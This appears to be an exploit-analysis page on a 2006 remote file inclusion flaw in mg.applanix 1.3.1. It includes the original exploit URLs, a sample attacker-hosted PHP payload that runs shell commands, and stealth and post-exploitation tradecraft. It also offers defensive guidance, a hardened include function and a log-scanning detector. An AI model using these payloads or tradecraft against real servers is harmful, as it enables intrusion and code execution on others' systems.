Understanding Remote File Inclusion in mg.applanix 1.3.1

What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability found in version 1.3.1 of the mg.applanix web application. The author, v1per-haCker, demonstrates how an attacker can exploit this vulnerability to include and execute arbitrary files from a remote server. This allows for potential code execution on the target web server.
Simple technical breakdown
The mg.applanix application, specifically its PHP scripts, fails to properly sanitize user-supplied input for the apx_root_path parameter. This parameter is intended to specify a root path for application files. However, because the application doesn't validate this input, an attacker can provide a URL pointing to a remote file (like a PHP script or a text file containing malicious code) instead of a local path. When the application then tries to include this remote file, it effectively downloads and executes the content from the attacker's server.
Complete code and payload walkthrough
The provided paper does not contain any executable code or shellcode in the traditional sense. Instead, it focuses on identifying the vulnerable parameter and demonstrating how to exploit it through crafted URLs.
The core of the exploit lies in manipulating the apx_root_path parameter within specific PHP scripts of the mg.applanix application.
Here's a breakdown of the exploit examples provided:
- `http://localhost/path/act/act_check_access.php?apx_root_path=http://EvElCoDe.txt?`
  - `http://localhost/path/act/act_check_access.php`: This is the vulnerable script on the target server.
  - `apx_root_path=`: This is the parameter that is vulnerable to RFI.
  - `http://EvElCoDe.txt?`: This is the attacker-controlled URL. The attacker would host a file named `EvElCoDe.txt` (or any other name) on their own web server. This file would contain the malicious PHP code they want to execute on the target. The trailing `?` is often used to terminate the parameter value if the script itself might append further query parameters.
- `http://localhost/path/dsp/dsp_form_booking_ctl.php?apx_root_path=http://EvElCoDe.txt?`: Similar to the above, but targets a different script: `dsp_form_booking_ctl.php`.
- `http://localhost/path/dsp/dsp_bookings.php?apx_root_path=http://EvElCoDe.txt?`: Again, a similar exploit targeting another script: `dsp_bookings.php`.
Explanation of the RFI mechanism:
- Vulnerable Script: The PHP scripts (`act_check_access.php`, `dsp_form_booking_ctl.php`, `dsp_bookings.php`) likely use a function like `include()` or `require()` to load content based on the `apx_root_path` parameter.
- Input Manipulation: An attacker provides a URL (`http://EvElCoDe.txt?`) as the value for `apx_root_path`.
- Remote Inclusion: The PHP interpreter, when encountering `include('http://EvElCoDe.txt?')`, attempts to fetch the content from the specified remote URL.
- Code Execution: If the remote file (`EvElCoDe.txt`) contains valid PHP code, the target server will execute it as if it were a local script.
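The include pattern described above, placed next to a hardened replacement, as an added example; this is not code from the paper or from mg.applanix (whose source is not reproduced on this page). The function names, the `lib/config.php` file name and the temporary fixture directory are assumptions made for the example. One fact worth keeping in mind when reading it: from PHP 5.2.0 onward the setting that governs remote fetches through `include()`/`require()` is `allow_url_include`, which is separate from `allow_url_fopen`; on older builds, which is what the paper was written against, `allow_url_fopen` alone controlled it.

```php
<?php
// Added example (not code from the original paper or from mg.applanix):
// the include pattern the paper describes, next to a hardened replacement.
// Function names, the "lib/config.php" file name and the fixture directory
// are assumptions made for this example.

// --- Vulnerable shape ---------------------------------------------------
// The root path is read straight from the request and passed to include().
// With allow_url_fopen (PHP < 5.2) or allow_url_include (PHP >= 5.2) enabled,
// a value such as "http://EvElCoDe.txt?" makes PHP fetch and execute remote
// content; with them disabled it is still a local-file-inclusion sink.
function vulnerableInclude(array $request): void
{
    $apx_root_path = $request['apx_root_path'];     // untrusted input
    include $apx_root_path . 'lib/config.php';      // RFI / LFI sink
}

// --- Hardened shape -----------------------------------------------------
// Resolve the candidate and accept it only if it is a real directory inside
// an allow-listed base; anything carrying a URL scheme or PHP stream wrapper
// (http://, ftp://, php://, data:, phar://, ...) is refused before any I/O.
function resolveRootPath(string $candidate, string $allowedBase): ?string
{
    if (preg_match('~^[a-z][a-z0-9+.\-]*:~i', $candidate)) {
        return null;                                 // scheme or wrapper
    }
    if (strpos($candidate, "\0") !== false) {
        return null;                                 // NUL-byte truncation
    }
    $base = realpath($allowedBase);
    $real = realpath($candidate);
    if ($base === false || $real === false || !is_dir($real)) {
        return null;                                 // missing or not a directory
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                                 // escapes the allowed base
    }
    return $real;
}

function hardenedInclude(array $request, string $allowedBase): void
{
    $root = resolveRootPath((string) ($request['apx_root_path'] ?? ''), $allowedBase);
    if ($root === null) {
        http_response_code(400);
        exit('invalid apx_root_path');
    }
    include $root . '/lib/config.php';
}

// Deployment check: is remote inclusion switched on at all?
function remoteIncludeEnabled(): bool
{
    $v = strtolower((string) ini_get('allow_url_include'));
    return in_array($v, ['1', 'on', 'true', 'yes'], true);
}

// --- Demo on a constructed fixture ---------------------------------------
if (PHP_SAPI === 'cli') {
    $base = sys_get_temp_dir() . '/applanix_demo_' . getmypid();
    mkdir($base . '/themes/default/lib', 0700, true);
    file_put_contents($base . '/themes/default/lib/config.php', "<?php return 'ok';\n");

    $inputs = [
        $base . '/themes/default',   // legitimate local directory
        'http://EvElCoDe.txt?',      // the paper's payload shape
        'php://input',               // stream wrapper
        $base . '/../../etc',        // traversal outside the base
    ];
    foreach ($inputs as $in) {
        $r = resolveRootPath($in, $base);
        printf("%-40s => %s\n", $in, $r === null ? 'REJECTED' : 'OK ' . $r);
    }
    printf("allow_url_include enabled: %s\n", remoteIncludeEnabled() ? 'yes' : 'no');
}
```

`resolveRootPath()` rejects the scheme before touching the filesystem, so the server never issues an outbound request even if `allow_url_include` happens to be on; the `realpath()` containment check then closes the local traversal variant. The scheme regex also matches a Windows drive letter (`C:`), so a Windows deployment needs a narrower test. The better fix, which `hardenedInclude()` only approximates, is to not accept the root path from the request at all.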
Mapping of code fragment/block -> practical purpose:
`apx_root_path=http://EvElCoDe.txt?`: This is the exploit payload. It's not code in the traditional sense but a crafted URL that tricks the vulnerable PHP script into including and executing remote content. The "code" is what resides in `EvElCoDe.txt` on the attacker's server.
Shellcode/Payload Segments:
There are no explicit shellcode bytes provided in this paper. The "payload" is the content of the remote file (EvElCoDe.txt) that the attacker hosts. This file would typically contain PHP code.
Example of EvElCoDe.txt content (attacker-hosted):
```php
<?php
// This is a simple example of malicious PHP code
// that could be placed in EvElCoDe.txt
echo "<h1>Hacked!</h1>";
echo "<p>System information:</p>";
echo "<pre>";
// Execute a system command and display output
echo shell_exec("uname -a");
echo "</pre>";
// You could also include a web shell here
?>
```
Practical details for offensive operations teams
- Required Access Level: Low. This is a remote vulnerability exploitable via HTTP requests. No prior authentication or local access is typically required.
- Lab Preconditions:
  - A target web server running mg.applanix version 1.3.1 or a similarly vulnerable version.
  - The target server must have PHP installed and configured to allow remote file inclusions (e.g., `allow_url_fopen` enabled in `php.ini`).
  - An attacker-controlled web server to host the malicious payload (e.g., a PHP script or a text file with PHP code).
- Tooling Assumptions:
  - A web browser for manual testing or a web vulnerability scanner.
  - Tools like `curl` or `wget` for crafting and sending HTTP requests.
  - A simple web server (e.g., Python's `http.server`, Apache, Nginx) to host the attacker's payload.
- Execution Pitfalls:
  - `allow_url_fopen` disabled: If `allow_url_fopen` is disabled in the target server's `php.ini` configuration, the PHP interpreter will not be able to fetch remote files via `include()` or `require()`, rendering this RFI exploit ineffective.
  - Input Sanitization/Validation: Later versions of mg.applanix or custom WAF rules might sanitize or validate the `apx_root_path` parameter, preventing the inclusion of external URLs.
  - Firewall Restrictions: Network firewalls on the target or attacker's side might block the HTTP request from the target server to the attacker's server.
  - Payload Encoding/Obfuscation: If basic RFI is blocked, attackers might need to use more advanced techniques like LFI-to-RFI chains or obfuscate their payloads.
  - Trailing Characters: The trailing `?` in the exploit URL is important. If the vulnerable script appends its own parameters, the `?` ensures the attacker's URL is correctly terminated. Without it, the script might try to include `http://EvElCoDe.txt?some_other_param=value`, which would likely fail.
- Tradecraft Considerations:
  - Reconnaissance: Identify the specific version of mg.applanix being used. Look for common vulnerable parameters in web applications.
  - Payload Hosting: Host the malicious payload on a reliable server that is accessible from the target. Consider using a domain that doesn't immediately raise suspicion.
  - Stealth: Avoid using obvious payload filenames like `shell.php`. Use more innocuous names.
  - Post-Exploitation: Once code execution is achieved, the immediate goal is often to establish persistence, escalate privileges, or exfiltrate data. The RFI exploit itself is just the initial entry vector.
Where this was used and when
- Context: This vulnerability was discovered and published in 2006. It targets a specific web application (mg.applanix) used for managing appointments or bookings.
- Timeframe: The exploit was published on November 17, 2006. This type of RFI vulnerability was common in PHP applications of that era due to less stringent input validation practices.
Defensive lessons for modern teams
- Input Validation is Crucial: Always validate and sanitize all user-supplied input, especially when it's used in file operations or dynamic code execution. For file paths, ensure they point to expected local files and do not contain URL schemes.
- Disable `allow_url_fopen` and `allow_url_include`: In `php.ini`, it's highly recommended to disable `allow_url_fopen` and `allow_url_include` unless absolutely necessary for specific, controlled functionalities. This prevents PHP from fetching remote files via `include()`, `require()`, `fopen()`, etc.
- Web Application Firewalls (WAFs): Implement and maintain WAFs that can detect and block common RFI patterns in HTTP requests.
- Regular Patching and Updates: Keep all web applications and their dependencies (like PHP itself) updated to the latest secure versions.
- Secure Coding Practices: Train developers on secure coding principles, including the dangers of insecure file handling and dynamic code execution.
- Least Privilege: Ensure web server processes run with the minimum necessary privileges to limit the impact of a successful compromise.
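For the WAF and monitoring side of the lessons above, here is an added example (not from the paper or from mg.applanix) of the detection logic a defender would run over web-server access logs: it parses "combined"-format lines and flags any query parameter whose value starts with a URL scheme or PHP stream wrapper, which is exactly the shape of the `apx_root_path=http://...` requests, and separately flags traversal-style values. The four log lines are constructed for the example; the client and payload-host addresses are RFC 5737 documentation ranges, and the script paths under `/booking/` are assumed.

```php
<?php
// Added example, not part of the original paper or of mg.applanix: a small
// scanner over "combined" access-log lines that flags query-string parameters
// whose value carries a URL scheme or PHP stream wrapper (the shape of the
// apx_root_path=http://... requests) and, separately, traversal-style values.
// The log lines are constructed; addresses are RFC 5737 documentation ranges.

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [17/Nov/2006:10:01:22 +0000] "GET /booking/dsp/dsp_bookings.php?week=47 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.9 - - [17/Nov/2006:10:02:03 +0000] "GET /booking/act/act_check_access.php?apx_root_path=http://198.51.100.7/EvElCoDe.txt? HTTP/1.1" 200 312 "-" "curl/7.15.0"
203.0.113.9 - - [17/Nov/2006:10:02:41 +0000] "GET /booking/dsp/dsp_form_booking_ctl.php?apx_root_path=php://input HTTP/1.1" 500 0 "-" "curl/7.15.0"
203.0.113.12 - - [17/Nov/2006:10:03:10 +0000] "GET /booking/dsp/dsp_bookings.php?apx_root_path=../../config/ HTTP/1.1" 200 4870 "-" "Mozilla/4.0"
LOG;

// Classify one decoded parameter value. A leading scheme is the RFI
// signature; ".." or a NUL byte is the sibling local-inclusion signature.
function classifyValue(string $value): ?string
{
    if (preg_match('~^[a-z][a-z0-9+.\-]*:~i', $value)) {
        return 'remote-or-wrapper';
    }
    if (strpos($value, '..') !== false || strpos($value, "\0") !== false) {
        return 'traversal';
    }
    return null;
}

// Returns one finding per suspicious parameter:
// [client, timestamp, script, parameter, value, kind].
function scanAccessLog(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client ident user [timestamp] "METHOD target PROTO" ...
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)/', $line, $m)) {
            continue;                                // not a combined-format line
        }
        [, $client, $ts, , $target] = $m;
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;                                // no query string
        }
        $script = substr($target, 0, $qpos);
        parse_str(substr($target, $qpos + 1), $params);   // percent-decodes values
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue;                            // array-style parameter
            }
            $kind = classifyValue($value);
            if ($kind !== null) {
                $findings[] = [$client, $ts, $script, (string) $name, $value, $kind];
            }
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    // Expected: three findings (two remote-or-wrapper, one traversal);
    // the "week=47" request is left alone.
    foreach (scanAccessLog(SAMPLE_LOG) as [$client, $ts, $script, $name, $value, $kind]) {
        printf("[%s] %s %s %s %s=%s\n", $kind, $client, $ts, $script, $name, $value);
    }
}
```

Two points for anyone adapting this: `parse_str()` decodes one layer of percent-encoding, so a doubly-encoded value (`http%253A%252F%252F...`) would slip past `classifyValue()` unless the value is decoded again before classification; and the scheme regex deliberately matches `php:` and `data:` as well as `http:`, because the wrapper variants abuse the same include sink without any outbound connection. Requests that hit a script and then produce a 500, as in the third line, are worth correlating with the PHP error log.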
ASCII visual (if applicable)
+-----------------+       +----------------------+       +--------------------+
| Attacker's      |------>| Target Web Server    |------>| Attacker's Server  |
| Machine         |       | (mg.applanix v1.3.1) |       | (hosting payload)  |
| (Crafts Request)|       |                      |       |                    |
+-----------------+       +----------------------+       +--------------------+
        |                           |
        | HTTP Request              | Fetch Payload
        | (e.g., GET /path/act/     | (e.g., GET /EvElCoDe.txt)
        |  act_check_access.php?    |
        |  apx_root_path=http://    |
        |  attacker.com/payload.php)|
        |                           |
        +---------------------------+
                     |
                     | PHP Interpreter on Target
                     | executes fetched payload
                     v

This diagram illustrates the flow: the attacker crafts a request targeting the vulnerable web application. The web application, due to the RFI vulnerability, then makes a request to the attacker's server to fetch the payload. Finally, the target server's PHP interpreter executes the fetched payload.
Source references
- PAPER ID: 2794
- PAPER TITLE: mg.applanix 1.3.1 - 'apx_root_path' Remote File Inclusion
- AUTHOR: v1per-haCker
- PUBLISHED: 2006-11-17
- PAPER URL: https://www.exploit-db.com/papers/2794
- RAW URL: https://www.exploit-db.com/raw/2794
Original Exploit-DB Content (Verbatim)
#########################################################################################
###################################v1per-haCker##########################################
######################How I Can lives Without FooL Programmer!###########################
#########################################################################################
#=======================================================================================#
#___________________________________mg.applanix (RFI)___________________________________#
#=======================================================================================#
# Information:- #
# #
# Scripts: mg.applanix #
# download : http://freshmeat.net/redir/applanix/38915/url_zip/mg.applanix_1.3.1.zip #
# Version : 1.3.1 #
# Dork & vuln : download script and think :) #
# #
#=======================================================================================#
# Exploit : #
# #
#http://localhost/path/act/act_check_access.php?apx_root_path=http://EvElCoDe.txt? #
#http://localhost/path/dsp/dsp_form_booking_ctl.php?apx_root_path=http://EvElCoDe.txt? #
#http://localhost/path/dsp/dsp_bookings.php?apx_root_path=http://EvElCoDe.txt? #
# #
#=======================================================================================#
# Discoverd By : v1per-haCker #
# #
# Conatact : v1per-hacker[at]hotmail.com #
# #
# XP10_hackEr Team >> www.xp10.com #
# SpeciaL PoweR SecuritY TeaM >> www.specialpower.org #
# #
# Greetz to : | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL | #
# | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB | #
# | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota | #
# | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO | #
# | MuhaciR |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi | #
# #
# Thanks >> /str0ke & www.milw0rm.com & www.google.com #
#=======================================================================================#
#########################################################################################
#################################L0ve is L1fe W0und3r####################################
#########################################################################################
# milw0rm.com [2006-11-17]